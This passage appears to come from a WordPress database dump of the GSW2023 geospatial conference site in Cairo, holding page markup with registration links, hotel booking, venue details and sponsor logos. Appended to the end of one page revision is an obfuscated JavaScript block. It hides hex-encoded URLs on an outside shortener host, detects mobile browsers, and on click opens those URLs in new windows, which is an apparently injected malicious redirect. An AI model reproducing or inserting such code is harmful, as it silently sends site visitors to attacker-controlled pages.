link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#8224e3\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:23:19','2023-05-17 04:23:19','',3066,'https://gsw2023.com/?p=4509',0,'revision','',0),
(4510,1,'2023-05-17 04:26:19','2023-05-17 04:26:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" 